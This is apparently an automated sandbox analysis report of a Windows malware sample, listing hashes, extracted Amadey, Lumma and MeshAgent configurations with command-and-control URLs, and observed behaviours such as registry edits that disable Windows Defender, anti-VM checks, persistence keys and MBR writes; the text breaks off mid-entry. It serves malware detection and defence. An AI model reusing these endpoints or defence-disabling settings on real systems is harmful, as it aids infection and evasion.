Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
04/04/2025, 18:08
Static task
static1
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
511a46ccd78cce08bbe3852e46759f3a
-
SHA1
1e5432375da94d634caef4fc85ed3bb3edb09651
-
SHA256
b8a3e996398fb26ef8050911baefffc55e9787668fa1bb97b2a9c7567e57cb6c
-
SHA512
75f4176830921ba65ba6fba1cafe6ff5291e4c583f71866b7485cbfee1f5611edf7258e41b346cfdf68bf1c1d83967ef11c9af6792a93e109e0739c6a328a7ec
-
SSDEEP
49152:jOKL0j4+oEcJwrf1LLlVaDkMVEz9fKh3ccDnz:Uj4zJCLXahVB3zH
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://krxspint.digital/kendwz
https://jrxsafer.top/shpaoz
https://rhxhube.run/pogrs
https://ogrxeasyw.digital/xxepw
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://xrfxcaseq.live/gspaz
https://ywmedici.top/noagis
https://pepperiop.digital/oage
https://plantainklj.run/opafg
https://puerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://3z7advennture.top/GKsiio
https://rambutanvcx.run/adioz
https://navstarx.shop/FoaJSi
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://starcloc.bet/GOksAo
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
Extracted
meshagent
2
test123
http://aaso12.duckdns.org:443/agent.ashx
-
mesh_id
0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C
-
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
-
wss
wss://aaso12.duckdns.org:443/agent.ashx
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2504-9228-0x0000000000DC0000-0x0000000001214000-memory.dmp healer behavioral1/memory/2504-9227-0x0000000000DC0000-0x0000000001214000-memory.dmp healer behavioral1/memory/2504-12088-0x0000000000DC0000-0x0000000001214000-memory.dmp healer -
Detects MeshAgent payload 1 IoCs
resource yara_rule behavioral1/files/0x001000000002401f-2978.dat family_meshagent -
Healer family
-
Lumma family
-
Meshagent family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 66a7aa70aa.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 66a7aa70aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 66a7aa70aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 66a7aa70aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 66a7aa70aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 66a7aa70aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 66a7aa70aa.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 66a7aa70aa.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 66a7aa70aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 66a7aa70aa.exe -
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ab0e067345.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e1d4d40336.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 66a7aa70aa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 268a518848.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ abb6489dab.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 6912 powershell.exe 1680 powershell.exe 4612 powershell.exe 5192 powershell.exe 2396 powershell.exe 6192 powershell.exe 6456 powershell.exe 3168 powershell.exe 3116 powershell.exe 6016 powershell.exe 1432 powershell.exe 5276 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 13 IoCs
flow pid Process 67 2476 rapes.exe 67 2476 rapes.exe 67 2476 rapes.exe 67 2476 rapes.exe 67 2476 rapes.exe 277 3640 svchost015.exe 462 5316 svchost015.exe 555 2476 rapes.exe 709 2476 rapes.exe 709 2476 rapes.exe 896 6812 svchost.exe 25 2476 rapes.exe 36 2476 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 3728 takeown.exe 4616 icacls.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" " s.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" " s.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a6c25b1806.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ab0e067345.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e1d4d40336.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion abb6489dab.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a6c25b1806.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 66a7aa70aa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ab0e067345.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e1d4d40336.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 268a518848.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 268a518848.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 66a7aa70aa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion abb6489dab.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 262.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 262.exe Key value queried \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Control Panel\International\Geo\Nation 7IIl2eE.exe -
Executes dropped EXE 30 IoCs
pid Process 2476 rapes.exe 2100 Mbxp0H9.exe 5200 dHoOS9OdFu.exe 3700 tFtfP0IiOz.exe 3468 dHoOS9OdFu.exe 4788 7q8Wm5h.exe 4668 apple.exe 3520 262.exe 1080 262.exe 2668 1d96eeb059.exe 3484 MeshAgent.exe 3640 svchost015.exe 4332 FrameworkName.exe 5204 rapes.exe 3376 268a518848.exe 5316 svchost015.exe 1788 RLPhvHg.exe 1256 abb6489dab.exe 2700 a6c25b1806.exe 3372 7d66731089.exe 2504 66a7aa70aa.exe 1740 7q8Wm5h.exe 5320 rapes.exe 1976 ab0e067345.exe 6960 7IIl2eE.exe 3632 Passwords.com 2408 e1d4d40336.exe 7092 MeshAgent.exe 7016 UZPt0hR.exe 6196 TbV75ZR.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine e1d4d40336.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 268a518848.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine abb6489dab.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine ab0e067345.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine 66a7aa70aa.exe Key opened \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\Software\Wine rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 3728 takeown.exe 4616 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 66a7aa70aa.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 66a7aa70aa.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\66a7aa70aa.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450180101\\66a7aa70aa.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\abb6489dab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450150101\\abb6489dab.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a6c25b1806.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450160101\\a6c25b1806.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7d66731089.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450170101\\7d66731089.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 e1d4d40336.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000024281-8803.dat autoit_exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\System32\kernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\DLL\kernel32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\gdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\exe\MeshService64.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\exe\MeshService64.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\iphlpapi.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\System32\MeshService64.pdb MeshAgent.exe File opened for modification C:\Windows\System32\gdi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\DLL\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\win32u.pdb MeshAgent.exe File opened for modification C:\Windows\System32\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\win32u.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\shcore.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\A35658EBE997E8B1AB671E4D2327CA854815033A MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\kernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\System32\combase.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\System32\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\System32\combase.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E1D6C9926A4469FA5D4413CD9FFC4EBDD8367F2C MeshAgent.exe File opened for modification C:\Windows\System32\symbols\dll\ntdll.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\rpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\crypt32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\rpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\System32\gdi32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\System32\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\System32\bcrypt.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\313050F579B27BB61129CC0AC817D3C7C36F0491 MeshAgent.exe File opened for modification C:\Windows\System32\user32.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 6952 tasklist.exe 6840 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 5672 random.exe 2476 rapes.exe 5204 rapes.exe 3376 268a518848.exe 1256 abb6489dab.exe 2504 66a7aa70aa.exe 5320 rapes.exe 1976 ab0e067345.exe 2408 e1d4d40336.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2100 set thread context of 5240 2100 Mbxp0H9.exe 98 PID 2668 set thread context of 3640 2668 1d96eeb059.exe 192 PID 3376 set thread context of 5316 3376 268a518848.exe 210 PID 4332 set thread context of 3776 4332 FrameworkName.exe 211 PID 6196 set thread context of 6960 6196 TbV75ZR.exe 293 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.exe s.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.exe s.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File created C:\Program Files\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job random.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4088 sc.exe 1192 sc.exe 1856 sc.exe 4052 sc.exe 5332 sc.exe 6004 sc.exe 4980 sc.exe 4148 sc.exe 4632 sc.exe 5164 sc.exe 2396 sc.exe 5536 sc.exe 2356 sc.exe 5408 sc.exe 4224 sc.exe 1428 sc.exe 5544 sc.exe 4944 sc.exe 5104 sc.exe 4208 sc.exe 2224 sc.exe 2380 sc.exe 3756 sc.exe 2544 sc.exe 4468 sc.exe 5644 sc.exe 3636 sc.exe 6048 sc.exe 2156 sc.exe 5344 sc.exe 4908 sc.exe 1808 sc.exe 3772 sc.exe 3656 sc.exe 5844 sc.exe 5964 sc.exe 1964 sc.exe 3116 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 46 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 262.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 262.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7d66731089.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 66a7aa70aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ab0e067345.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened 